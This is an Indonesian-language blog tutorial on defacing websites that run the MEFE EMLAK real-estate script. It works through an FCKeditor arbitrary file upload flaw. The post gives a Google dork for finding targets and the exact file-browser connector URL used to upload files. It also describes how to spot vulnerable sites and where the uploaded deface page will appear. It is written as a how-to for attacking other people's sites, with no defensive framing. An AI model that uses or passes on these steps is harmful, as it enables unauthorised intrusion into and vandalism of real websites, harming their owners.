Thursday, June 15, 2017

Home Tutorial Deface Tutorial Deface : Deface menggunakan FCKEditor Vulnerability 2017

Tutorial Deface : Deface menggunakan FCKEditor Vulnerability 2017

======================================================

Author : KaCaK

HomePage : http://www.griadamlar.com

Web App.Name : MEFE EMLAK SCRIPT

Price : N/A

Version : N/A

Software: http://emlak.mefe.net/

Vulnerability Style : File Upload

Bug : File Upload

=======================================================

Google Keyword ( Dork ) : inurl:advert_detail.php?id=

Exploit FCKeditor Artibary File Upload :

http://Site.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

Ciri ciri web yang yang bisa di exploit tuh kayak gambar dibawah ini

target.com/advert_detail.php?ID=(angka acak , stiap web berbeda beda )

kalau web vunl ciri cirinya kayak gambar di bawah ini , banyak filenya

Sedangkan web yang gak vunl kosong tampa file

Contoh kalau sudah di exploit

hasil defacean kita ada di

www.site.com/files ( kalo lu rename script pepesan lu jadi index.html)

www.site.com/files/namascriptlu.html ( kalo lu rename script pepesan lu bebas,contoh Cowo.html )

Sekian & semoga bermanfaat

sumber : https://cowokerensteam.blogspot.co.id/2016/09/deface-menggunakan-fckeditor_15.html

Defa Squad